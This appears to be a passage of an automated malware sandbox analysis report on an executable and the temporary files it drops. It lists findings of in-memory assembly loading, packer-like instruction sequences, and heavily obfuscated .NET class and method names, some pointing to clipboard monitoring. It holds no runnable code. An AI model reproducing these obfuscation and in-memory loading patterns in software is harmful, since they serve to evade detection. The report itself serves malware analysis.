Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs	.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6 System.AppDomain.Load(byte[])
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs	.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs	.Net Code: _2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG System.AppDomain.Load(byte[])
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs	.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6 System.AppDomain.Load(byte[])
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs	.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_00E7E708 push ds; retf	2_2_00E7E7EB
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_00E76A22 pushfd ; retf	2_2_00E76A23
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_00E70C55 push edi; retf	2_2_00E70C7A
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Code function: 3_2_00007FF848F2A27D push ebx; retn 0009h	3_2_00007FF848F2A3CA
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Code function: 3_2_00007FF848F200BD pushad ; iretd	3_2_00007FF848F200C1

Source: FB_7D21.tmp.exe.0.dr, lYfWlfT3r7Vqz88tbfAuCjKRe.cs	High entropy of concatenated method names: 'kOQ5Z9rwMXQQwsQd9U5wJwGgA', '_5IpOq6mDTAwrp2FTSgHzNUZ6U', 'cPbIlTDjsb7RjMx8Bnmb5BlYC', 'EGhvBkBPenl8anH8LxHEcrnawvcgNbGzlNbtSGDZidi', 'qgCXUhcFghV4Gn09Ux0zMANUpUDIbjpm3b5c3qcS7V8', 'SiVz1GzNIesBAG06rJk9SKNR72BDYDvWSYP7WvEdiQH', '_6Zu4a6W2P7MN3pmUPK9UfKjMO1giZz44TN0pivow5UZ', 'PlbLO24x9CCU8itVg1JImlB5d4peV1YS2Vsh7vULx3N', 'JDQPF1e80PPfAgh8UwKHm2qZ3SrjjTSDyRimnu0c1qC', 'Kv47HDZaPJK92FJq6cVgfoBr0skPYGt056SQmCHp3NL'
Source: FB_7D21.tmp.exe.0.dr, ZQNenIJ11v1eDG5LYuP2OrWwHq14u0rIiwxz57g1fXStOp9D7M6RmGJ4YKEdVQ5EUUTCTZv7PDDfMtzT.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'b6mTyduYMePwCfdIKIVaMUPHF', 'EJWHS3NIZk5yrShQV6UbTF7iG', 'HQWI8F3Evo98iZXl7nPp03wUd', 'uVfhorrceO8DDy2jZSCP4sjid'
Source: FB_7D21.tmp.exe.0.dr, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs	High entropy of concatenated method names: 'WOKIIYrThZTCGte1A75mpaGYcGTIovkGFkNhoWEfchfLgJza6BJD6Bwb8ldtUxY27BZGcEQ6Ko22VL0v', '_2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG', 'ct6moaFmxzSEwIBSw5rpr8RVGDQyhSzLEcWeKPn3GlTwBRfSaIJQGP4EqzmGtbrppHVemlokSFDIFISr', 'jUfEW1HLDovEWv1ZZ2zNiS7OUyhKjeBJXG86gTqRm21d1n8vbqzTfp312I43KRCVmeRCgSzDJZYBLYjh', 'gFbqVU5GBTH4rOArujDduUnOvWjfsKUedwGzlcoMMdxUxFKDjxuRbkOJ169CFT9IuRiDSHyxz88kCye0', '_639np3BrkfPYmPr9VF1r5l8eJcR7h6v7PQmNuTkTMjKBkD9o6eKvLwfYP4KVxtbHN8XIPtcwCW848AA5', '_4oih0kLo1v9w1DiU35KzsmEf23mDdPUhb668zPHv7Z9yZOdcwmAGhhBWdUpnyLSHCBVu8Td7QNPAcVDZ', 'EUaHo9pU6vromjIH1zi7gXzYtQGwuar6S7KHNbk1HrSucXpIoSL7I0aHw5NdgXG3IFRHPeNrXOw8so1J', 'QeaFyp7eNMwyVwtHpKxgZRxvsNRfRibyJWARpIr7sDRV2kDKRCjnVVuiToPBdap401IV879hVobpmuqK', 'V41AXdXRfohEGR0ea2I1kBGrbFeFb7frm4Y3YZ1FB2QHwHi368a6UPrH3ZgAmiKBBqkh0cS3TNxAQoXi'
Source: FB_7D21.tmp.exe.0.dr, hMY5B4KaPYBa602NktZ1e4wVF.cs	High entropy of concatenated method names: 'WxO6haGbmISoUIXjKWGw5O0f6', '_1KdIk1gCCecm5eb5zn8kSjK12', 'PxlPQIsDfwQvPbKvl2sd3YzC2', 'PQy6sJgSzykRZLc0OQgp3FF40', 'EILjjH71J0z6TCdH4iiqNMin5', 'QyEqwp20c4swV4XJJGsgNpnyq', 'LcILsujkk2zDB1CPWPVFG2jJx', 'uJOKVr0lx53sKgbsneL3CqWRx', 'f9VWvJM0sfsTL6ygejd44nBUT', 'LlvOkQs0TO79zqf2p1q3KccCh'
Source: FB_7D21.tmp.exe.0.dr, jK41xlYzptzDvBwid77hpLBxe.cs	High entropy of concatenated method names: 'OKzUlm8N3VhAQNuXvYaHxIv0O', '_2jsV4Dr67P8WIcVYQJEwwfWilcqMU7dWO5FaXzBdwnR', 't33agRLkVoIksIMaeHSr25f5MenSU0vXFDLuVr5rAWm', 'BVIgd1nQM1laXCOCutMUo4uF0HHRkd5UhpQp2AsEeS6', 'Ra43n4P4GpAazsLfytyMIOCicKFs70KMZtEfMom59my'
Source: FB_7D21.tmp.exe.0.dr, bfkfUlXphuDWexMb7Hptw9A0Uiqaqiv3wcTDH2rsesSLHtj7cBMyE3HGKstJUv0HzfSu8adin33UdVLY.cs	High entropy of concatenated method names: 'HDzzscQJvBYBgYGtyyJw0Z62S91wb7ZXDt1NMuqGZTnSVN2vcQlDTHXeH2XAhC3gmojn3hCdfamp4xSP', 'DyRfj0jL7Ne2bEzdE2WfU2J4e', '_5cwjx4oJK76DGZBC7HDMSIo6L', 'EkkfnLKHA7eoPdl7FGnKbHjqz', 'XPrOaSGzOF9BMPB0rdF2ZuE16'
Source: FB_7D21.tmp.exe.0.dr, pSKX2ESKYwtRu7HoonhxcJzXgzsbsBZuYOVd9Vds3yt1hGYR8g17cCz98HD7kBGbZuAOSHn3AJPgLdPW.cs	High entropy of concatenated method names: 'RegexResult', 'WndProc', 'AlbU71MZss4P6Ud3ulC0jWSFtpHi3ZI21vljNexmkwF', 'vaWpfakNS07K6OJldx85Yn0LszjPpqeyLwg5G7rfYDr'
Source: FB_7D21.tmp.exe.0.dr, lY7fu9PmBNVoe7FoMUHT8miYA4vYaJzHYkvOgkLtM9q5YWq4XECDe3geFnamAon5jKsHVH7R7dVyQ7jT.cs	High entropy of concatenated method names: '_5okLwiJ41foiIntIR1bpQIYeVfb2NjbOtPiEyruBdM93JdUDOzPl2DNcdaVHYoqzlbhpqvLy0J9EUv5c', 'zRuxKtrhDWbunSLsf08MNFwph9WUoxAFk7Peo2bBSgilCpod6rdX1Dipbez5CkglY8zOH38ZMrRgwDGy', 'fZjSXjVI15O2JneQcWK85ilLwUINAP6B4FkyPJRSzFE61yuJPAJ19HsvusKKZTzfg7lUQuBArOldit1m', 'H9LK03UymbxxebVhWZLTVv3J88tyfIEKzzm9OStrPybmLFzdpu1V3lVipOh8awPV4gwN4DXIusrByqJs', 'staanouH9VVllYfUirHPC8zURapjFNgkbkbX2so6bIvb3wjagEhKC8k4nreHsHMrkbfHI1zpEdwNYZDe', 'pksVU8d9sjP2rIBvVbq1TZVmILG3XBWNflKO6HKmIgXkSbX6NZ5DgPC3M0cZ9EsA0GNH75zt5OAnngZT', 'GxfNTiSDCrb2TBkwI3tRzIuCv', 'iqbQLy0cKqXw68POWUFeBa0d0', 'aQEYPV88MgVpz2hMiTlWb6OeS', 'TcHYqV6bJRKM2fPlJrCwUZzmw'
Source: FB_7D21.tmp.exe.0.dr, eaJ1eKHKproU4hPKL7zZaCt5LB6GnC019powyiFeyxf1p497Wp7fUp93E51MTTI9BUzY4mbqnkBEPVkB.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'rjdrfrwAPPrH1gmYvWMyWqSDfwqLZrtzMOvlKFth4qIJyiOf0wirwL5Om8LDhRnfIXZdMIop9WZXlb93', 'xXTE3lS6QGxTBbQ6kgQwrnpXxPaNKn9C9N6INDuT2MlzvDfgO4DXX3oQtM', 'CoeaOGHXL0uzLmA25lE8RaXN5bTKg89qRqnXEiCDnBpP14hEsB1GcFe021', 'zlIqWsIOWHNCPt6mOc8ndEvujhC768c6GbdgaLArA3C', 'efdMufKoG8bO1IUbkgO4A2TnkTN9z1dusJF9Pcw3daY'
Source: FB_7D21.tmp.exe.0.dr, AJvfNnDNTuJbwuIBkqtWLE92s69ypiSn3oEaccD5GcHIniAl3b0xmXCXXRQlDua39ELK6FfoXcbxDFtY.cs	High entropy of concatenated method names: 'Zc0UAmirWNgMyU7RPbJclq0193JoKzdFjsT4ZUKLtBhG1SBtPc6mSKSfvhSv0MF6g3KbymOiN34vXBn2', 'xTtuDFtpunXLooIWmqJev5GyqjMpjlO5Pn7UNZnkHrIGoYIGVa7IoMZCEfCFnDuXsUC2rwixA1bjDEUw', 'qOAWJaM4h2YSCf2MDhBIMnRhdMBJLpG0SKzQTS3P80vgUs7g3cS7PK9ThtidaIT1R0d1c5geZf4JXViM', '_2GsH2tkogI2SHuEIgb66fa097', '_6NGmkasVpmvh070n767Zd89nMCnZKzTKwRTM5nXWcHH', 'HRTNPv742zdrFAMGwyGGxu87xflCuNVlRzsJRf3UiCU', 'V79dguIYFqPHIKmsX53d2RFCHn4VhwACswLW99D4JC7', 'IZMLsuKXM0BIC3Kj75qehAvrxsOQwkZ30Igw0JxA80b', '_8bWGcTHdIsr9qNXOZP7YFjCbS0Kns99IFIzGWB3tHiN', 'R3atKa2W4XuqIcUUDI38NAdMcGQGZVbBvDxDMlnf6KB'
Source: FB_7D21.tmp.exe.0.dr, jGx5RVtWYDbZ1ToL6PNlOwWojB7jLJ6X5CBAFyGmvjvmlmioDwDZ5YjCVlsreufEP7Xse0xBH6GOHG8W.cs	High entropy of concatenated method names: 'PtV3PgKoBJTBfHxOerUNidcwttFhlmwA8WDrWJTvwC2tOWY6l2hr9WVMOE316RohdBnAt9DUJhilYxz3', '_8BcFZG9nKm0Y5eKfyHrDW01Wvwc7CixNNvv1qM9DSM7Xw9wX7hUMTZk9L2NrMS48M02xNbGRVqjpgeq0', 'r2jWTD7FccKEuteed9WoBhB1Vn4JqKKksl3P579LWfpSQW3lTEyzyN91wfwmfHktqShUVwDDavsU1w5r', '_1exytb0IPi12lfcbJAUh2727dO4kKzebEdYC9Pfp0kLBrUrqJOh9CBvY5JR50upgpoe4v1NAZTP9fLwf', 'dZsr8qHlvW1VCFIgnTvIMwWbWMJnC1TmJfHt6k8S2m3inKm9yojdFlmddNEqv0ZiX9eQe4LHUZHN04FI', 'jpDYV1bSvTmVc8YKjIjO2igHlU5iQbA37qnhQlaqhX8i9PzhNLXiZAv3xwb49LcIFxEGJ1FdueFBS7P3', '_2OgwX7POlj3Lc7k0HVLc96Jm1H13YqCu3MmxPt8PTCnT7UO158KKKLsh39l3t9KhGVtNJN8WXk0fPI73', 'pZFSqEaHAjFQiDGNuydShEAx9dEA9Z4XEyA9cjqfApsDWcTUx4G11fj6Fnd4Qa5F3r9uiYWbxvzA5Uoi', 'wPprlMMgS8b7KRfzzaYNtXG224hdQjXdQA2bY9s37h5XyJI0wqfyVDN55SZpOCxoo94AweNHBnHgQ8Tu', '_3DEtVD6Qj8FBLGIMfr4L1gJLG5Wh10yDVfhAwiXkVFEtyC8yiF81mnqH85ItdVEe6Xios4sz19oD7SY6'
Source: FB_7D21.tmp.exe.0.dr, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.cs	High entropy of concatenated method names: 'PNucxFnsZsmAH7ZtXAiLbYhTNwtoXdI3jSrG7l8JdFYI8y4ECae9QkpQxfCHI9CjoO37RtMbdN9QCRXA', 'jLiZEHlb8BeExAypewg0zeOoIRJBC4B4awLpTrKIInWmOfnIoqLljjFzAd1r2ByGWGH98bloN9ZRBPtd', 'tLRtcoizkEN95DWlJbuywj8qmTExZ2cF4QDYZKjqtBmUUedW8T9LcTtJFgNgl26hmcD6HXf3sdOMy3G7', 'pUQwgSO8RxKDRVwxnrsUWWj0QvQfWjrWlfB32szLybBrnHNL6P42mf3fEeFhXZQaTya4hKG6HBVYia6X', 'saI1iCbtHUFoBOe0YDbOsFuazEiP9peNaRt8lfw92OqJCrtCr0ntP3cXoqTKn0apPe2I7AbDQPdKNIRC', '_2LsIhZlfyiomhnjRA5BvAhexUvDfebqf3EIoHS0ytB9QGrcn0ugT72LAgdp9Grpxo0H4F7YyXQhOFPOy', '_5AWy2heCIieySYSYqguGUmV6MLXLVTLloftBenWstbEZdWXKjxN3X0bgVyF0wh25yHIvtuM1JbN9IsYP', 'WUvexTw2mL3On7KYwkAaLpgLg4QvlFX5Lg4Hs3pvpuyJAX12BxwE6WI7y2EbRbEwB6Ra5UdwXI7e0OgU', 'Ii9U3wE8YOPWYQykTTsUNk92la58iAVmecCGoooKy9uv8H2onRYJ7hpsTsnh61XZcHrteUk8Xbtobs67', 'kc0jgJebYNKe5XBYQAIof8kMjBCh79rlVPyB41WIALEb1JkDpf7SWQ7eAsYqDHx4WBu3vttZF2VEqDFC'
Source: FB_7D21.tmp.exe.0.dr, qmTkyAvhb2wNt6EFJkgKoQx8PUNM9p5XrEj4MhYLRljIFetnOWMNbr3hROe7cILDy1AzKJEMlJzfISXn.cs	High entropy of concatenated method names: 'T8N6JYRItBvITsl2B5FCZRlmiaVshMFO1A1pS8qCoXVzg8WrRMPQrOZ2MjWPZDNL96s4ZDXD0859xnzb', 'Hp4ifZNL0Zk6d3JpS3mb9ecb3cvLWnhrESlgjj4yKKVf2HuHhLzO70Ux8rvFtMehJKX6BsXWtMZA8md6', '_5I6uyywkP7w8NWl9CieCynsQVnYWuakDbIwAzhA75v0', 'CZK5mO0F213iwf5NMqGRXS9Fh8854sXfzLFunHGtctS', 'BsZyf5sKGTGC1Lb0aJbVV7wYV9Ce92dym7bdyixwf6K', 'Wo93OYkcN7j0LD2jtZuBD4VOYyPxDuYYemH99eds4Ph'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, lYfWlfT3r7Vqz88tbfAuCjKRe.cs	High entropy of concatenated method names: 'kOQ5Z9rwMXQQwsQd9U5wJwGgA', '_5IpOq6mDTAwrp2FTSgHzNUZ6U', 'cPbIlTDjsb7RjMx8Bnmb5BlYC', 'EGhvBkBPenl8anH8LxHEcrnawvcgNbGzlNbtSGDZidi', 'qgCXUhcFghV4Gn09Ux0zMANUpUDIbjpm3b5c3qcS7V8', 'SiVz1GzNIesBAG06rJk9SKNR72BDYDvWSYP7WvEdiQH', '_6Zu4a6W2P7MN3pmUPK9UfKjMO1giZz44TN0pivow5UZ', 'PlbLO24x9CCU8itVg1JImlB5d4peV1YS2Vsh7vULx3N', 'JDQPF1e80PPfAgh8UwKHm2qZ3SrjjTSDyRimnu0c1qC', 'Kv47HDZaPJK92FJq6cVgfoBr0skPYGt056SQmCHp3NL'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, ZQNenIJ11v1eDG5LYuP2OrWwHq14u0rIiwxz57g1fXStOp9D7M6RmGJ4YKEdVQ5EUUTCTZv7PDDfMtzT.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'b6mTyduYMePwCfdIKIVaMUPHF', 'EJWHS3NIZk5yrShQV6UbTF7iG', 'HQWI8F3Evo98iZXl7nPp03wUd', 'uVfhorrceO8DDy2jZSCP4sjid'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs	High entropy of concatenated method names: 'WOKIIYrThZTCGte1A75mpaGYcGTIovkGFkNhoWEfchfLgJza6BJD6Bwb8ldtUxY27BZGcEQ6Ko22VL0v', '_2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG', 'ct6moaFmxzSEwIBSw5rpr8RVGDQyhSzLEcWeKPn3GlTwBRfSaIJQGP4EqzmGtbrppHVemlokSFDIFISr', 'jUfEW1HLDovEWv1ZZ2zNiS7OUyhKjeBJXG86gTqRm21d1n8vbqzTfp312I43KRCVmeRCgSzDJZYBLYjh', 'gFbqVU5GBTH4rOArujDduUnOvWjfsKUedwGzlcoMMdxUxFKDjxuRbkOJ169CFT9IuRiDSHyxz88kCye0', '_639np3BrkfPYmPr9VF1r5l8eJcR7h6v7PQmNuTkTMjKBkD9o6eKvLwfYP4KVxtbHN8XIPtcwCW848AA5', '_4oih0kLo1v9w1DiU35KzsmEf23mDdPUhb668zPHv7Z9yZOdcwmAGhhBWdUpnyLSHCBVu8Td7QNPAcVDZ', 'EUaHo9pU6vromjIH1zi7gXzYtQGwuar6S7KHNbk1HrSucXpIoSL7I0aHw5NdgXG3IFRHPeNrXOw8so1J', 'QeaFyp7eNMwyVwtHpKxgZRxvsNRfRibyJWARpIr7sDRV2kDKRCjnVVuiToPBdap401IV879hVobpmuqK', 'V41AXdXRfohEGR0ea2I1kBGrbFeFb7frm4Y3YZ1FB2QHwHi368a6UPrH3ZgAmiKBBqkh0cS3TNxAQoXi'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, hMY5B4KaPYBa602NktZ1e4wVF.cs	High entropy of concatenated method names: 'WxO6haGbmISoUIXjKWGw5O0f6', '_1KdIk1gCCecm5eb5zn8kSjK12', 'PxlPQIsDfwQvPbKvl2sd3YzC2', 'PQy6sJgSzykRZLc0OQgp3FF40', 'EILjjH71J0z6TCdH4iiqNMin5', 'QyEqwp20c4swV4XJJGsgNpnyq', 'LcILsujkk2zDB1CPWPVFG2jJx', 'uJOKVr0lx53sKgbsneL3CqWRx', 'f9VWvJM0sfsTL6ygejd44nBUT', 'LlvOkQs0TO79zqf2p1q3KccCh'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, jK41xlYzptzDvBwid77hpLBxe.cs	High entropy of concatenated method names: 'OKzUlm8N3VhAQNuXvYaHxIv0O', '_2jsV4Dr67P8WIcVYQJEwwfWilcqMU7dWO5FaXzBdwnR', 't33agRLkVoIksIMaeHSr25f5MenSU0vXFDLuVr5rAWm', 'BVIgd1nQM1laXCOCutMUo4uF0HHRkd5UhpQp2AsEeS6', 'Ra43n4P4GpAazsLfytyMIOCicKFs70KMZtEfMom59my'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, bfkfUlXphuDWexMb7Hptw9A0Uiqaqiv3wcTDH2rsesSLHtj7cBMyE3HGKstJUv0HzfSu8adin33UdVLY.cs	High entropy of concatenated method names: 'HDzzscQJvBYBgYGtyyJw0Z62S91wb7ZXDt1NMuqGZTnSVN2vcQlDTHXeH2XAhC3gmojn3hCdfamp4xSP', 'DyRfj0jL7Ne2bEzdE2WfU2J4e', '_5cwjx4oJK76DGZBC7HDMSIo6L', 'EkkfnLKHA7eoPdl7FGnKbHjqz', 'XPrOaSGzOF9BMPB0rdF2ZuE16'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, pSKX2ESKYwtRu7HoonhxcJzXgzsbsBZuYOVd9Vds3yt1hGYR8g17cCz98HD7kBGbZuAOSHn3AJPgLdPW.cs	High entropy of concatenated method names: 'RegexResult', 'WndProc', 'AlbU71MZss4P6Ud3ulC0jWSFtpHi3ZI21vljNexmkwF', 'vaWpfakNS07K6OJldx85Yn0LszjPpqeyLwg5G7rfYDr'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, lY7fu9PmBNVoe7FoMUHT8miYA4vYaJzHYkvOgkLtM9q5YWq4XECDe3geFnamAon5jKsHVH7R7dVyQ7jT.cs	High entropy of concatenated method names: '_5okLwiJ41foiIntIR1bpQIYeVfb2NjbOtPiEyruBdM93JdUDOzPl2DNcdaVHYoqzlbhpqvLy0J9EUv5c', 'zRuxKtrhDWbunSLsf08MNFwph9WUoxAFk7Peo2bBSgilCpod6rdX1Dipbez5CkglY8zOH38ZMrRgwDGy', 'fZjSXjVI15O2JneQcWK85ilLwUINAP6B4FkyPJRSzFE61yuJPAJ19HsvusKKZTzfg7lUQuBArOldit1m', 'H9LK03UymbxxebVhWZLTVv3J88tyfIEKzzm9OStrPybmLFzdpu1V3lVipOh8awPV4gwN4DXIusrByqJs', 'staanouH9VVllYfUirHPC8zURapjFNgkbkbX2so6bIvb3wjagEhKC8k4nreHsHMrkbfHI1zpEdwNYZDe', 'pksVU8d9sjP2rIBvVbq1TZVmILG3XBWNflKO6HKmIgXkSbX6NZ5DgPC3M0cZ9EsA0GNH75zt5OAnngZT', 'GxfNTiSDCrb2TBkwI3tRzIuCv', 'iqbQLy0cKqXw68POWUFeBa0d0', 'aQEYPV88MgVpz2hMiTlWb6OeS', 'TcHYqV6bJRKM2fPlJrCwUZzmw'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eaJ1eKHKproU4hPKL7zZaCt5LB6GnC019powyiFeyxf1p497Wp7fUp93E51MTTI9BUzY4mbqnkBEPVkB.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'rjdrfrwAPPrH1gmYvWMyWqSDfwqLZrtzMOvlKFth4qIJyiOf0wirwL5Om8LDhRnfIXZdMIop9WZXlb93', 'xXTE3lS6QGxTBbQ6kgQwrnpXxPaNKn9C9N6INDuT2MlzvDfgO4DXX3oQtM', 'CoeaOGHXL0uzLmA25lE8RaXN5bTKg89qRqnXEiCDnBpP14hEsB1GcFe021', 'zlIqWsIOWHNCPt6mOc8ndEvujhC768c6GbdgaLArA3C', 'efdMufKoG8bO1IUbkgO4A2TnkTN9z1dusJF9Pcw3daY'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, AJvfNnDNTuJbwuIBkqtWLE92s69ypiSn3oEaccD5GcHIniAl3b0xmXCXXRQlDua39ELK6FfoXcbxDFtY.cs	High entropy of concatenated method names: 'Zc0UAmirWNgMyU7RPbJclq0193JoKzdFjsT4ZUKLtBhG1SBtPc6mSKSfvhSv0MF6g3KbymOiN34vXBn2', 'xTtuDFtpunXLooIWmqJev5GyqjMpjlO5Pn7UNZnkHrIGoYIGVa7IoMZCEfCFnDuXsUC2rwixA1bjDEUw', 'qOAWJaM4h2YSCf2MDhBIMnRhdMBJLpG0SKzQTS3P80vgUs7g3cS7PK9ThtidaIT1R0d1c5geZf4JXViM', '_2GsH2tkogI2SHuEIgb66fa097', '_6NGmkasVpmvh070n767Zd89nMCnZKzTKwRTM5nXWcHH', 'HRTNPv742zdrFAMGwyGGxu87xflCuNVlRzsJRf3UiCU', 'V79dguIYFqPHIKmsX53d2RFCHn4VhwACswLW99D4JC7', 'IZMLsuKXM0BIC3Kj75qehAvrxsOQwkZ30Igw0JxA80b', '_8bWGcTHdIsr9qNXOZP7YFjCbS0Kns99IFIzGWB3tHiN', 'R3atKa2W4XuqIcUUDI38NAdMcGQGZVbBvDxDMlnf6KB'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, jGx5RVtWYDbZ1ToL6PNlOwWojB7jLJ6X5CBAFyGmvjvmlmioDwDZ5YjCVlsreufEP7Xse0xBH6GOHG8W.cs	High entropy of concatenated method names: 'PtV3PgKoBJTBfHxOerUNidcwttFhlmwA8WDrWJTvwC2tOWY6l2hr9WVMOE316RohdBnAt9DUJhilYxz3', '_8BcFZG9nKm0Y5eKfyHrDW01Wvwc7CixNNvv1qM9DSM7Xw9wX7hUMTZk9L2NrMS48M02xNbGRVqjpgeq0', 'r2jWTD7FccKEuteed9WoBhB1Vn4JqKKksl3P579LWfpSQW3lTEyzyN91wfwmfHktqShUVwDDavsU1w5r', '_1exytb0IPi12lfcbJAUh2727dO4kKzebEdYC9Pfp0kLBrUrqJOh9CBvY5JR50upgpoe4v1NAZTP9fLwf', 'dZsr8qHlvW1VCFIgnTvIMwWbWMJnC1TmJfHt6k8S2m3inKm9yojdFlmddNEqv0ZiX9eQe4LHUZHN04FI', 'jpDYV1bSvTmVc8YKjIjO2igHlU5iQbA37qnhQlaqhX8i9PzhNLXiZAv3xwb49LcIFxEGJ1FdueFBS7P3', '_2OgwX7POlj3Lc7k0HVLc96Jm1H13YqCu3MmxPt8PTCnT7UO158KKKLsh39l3t9KhGVtNJN8WXk0fPI73', 'pZFSqEaHAjFQiDGNuydShEAx9dEA9Z4XEyA9cjqfApsDWcTUx4G11fj6Fnd4Qa5F3r9uiYWbxvzA5Uoi', 'wPprlMMgS8b7KRfzzaYNtXG224hdQjXdQA2bY9s37h5XyJI0wqfyVDN55SZpOCxoo94AweNHBnHgQ8Tu', '_3DEtVD6Qj8FBLGIMfr4L1gJLG5Wh10yDVfhAwiXkVFEtyC8yiF81mnqH85ItdVEe6Xios4sz19oD7SY6'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.cs	High entropy of concatenated method names: 'PNucxFnsZsmAH7ZtXAiLbYhTNwtoXdI3jSrG7l8JdFYI8y4ECae9QkpQxfCHI9CjoO37RtMbdN9QCRXA', 'jLiZEHlb8BeExAypewg0zeOoIRJBC4B4awLpTrKIInWmOfnIoqLljjFzAd1r2ByGWGH98bloN9ZRBPtd', 'tLRtcoizkEN95DWlJbuywj8qmTExZ2cF4QDYZKjqtBmUUedW8T9LcTtJFgNgl26hmcD6HXf3sdOMy3G7', 'pUQwgSO8RxKDRVwxnrsUWWj0QvQfWjrWlfB32szLybBrnHNL6P42mf3fEeFhXZQaTya4hKG6HBVYia6X', 'saI1iCbtHUFoBOe0YDbOsFuazEiP9peNaRt8lfw92OqJCrtCr0ntP3cXoqTKn0apPe2I7AbDQPdKNIRC', '_2LsIhZlfyiomhnjRA5BvAhexUvDfebqf3EIoHS0ytB9QGrcn0ugT72LAgdp9Grpxo0H4F7YyXQhOFPOy', '_5AWy2heCIieySYSYqguGUmV6MLXLVTLloftBenWstbEZdWXKjxN3X0bgVyF0wh25yHIvtuM1JbN9IsYP', 'WUvexTw2mL3On7KYwkAaLpgLg4QvlFX5Lg4Hs3pvpuyJAX12BxwE6WI7y2EbRbEwB6Ra5UdwXI7e0OgU', 'Ii9U3wE8YOPWYQykTTsUNk92la58iAVmecCGoooKy9uv8H2onRYJ7hpsTsnh61XZcHrteUk8Xbtobs67', 'kc0jgJebYNKe5XBYQAIof8kMjBCh79rlVPyB41WIALEb1JkDpf7SWQ7eAsYqDHx4WBu3vttZF2VEqDFC'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, qmTkyAvhb2wNt6EFJkgKoQx8PUNM9p5XrEj4MhYLRljIFetnOWMNbr3hROe7cILDy1AzKJEMlJzfISXn.cs	High entropy of concatenated method names: 'T8N6JYRItBvITsl2B5FCZRlmiaVshMFO1A1pS8qCoXVzg8WrRMPQrOZ2MjWPZDNL96s4ZDXD0859xnzb', 'Hp4ifZNL0Zk6d3JpS3mb9ecb3cvLWnhrESlgjj4yKKVf2HuHhLzO70Ux8rvFtMehJKX6BsXWtMZA8md6', '_5I6uyywkP7w8NWl9CieCynsQVnYWuakDbIwAzhA75v0', 'CZK5mO0F213iwf5NMqGRXS9Fh8854sXfzLFunHGtctS', 'BsZyf5sKGTGC1Lb0aJbVV7wYV9Ce92dym7bdyixwf6K', 'Wo93OYkcN7j0LD2jtZuBD4VOYyPxDuYYemH99eds4Ph'
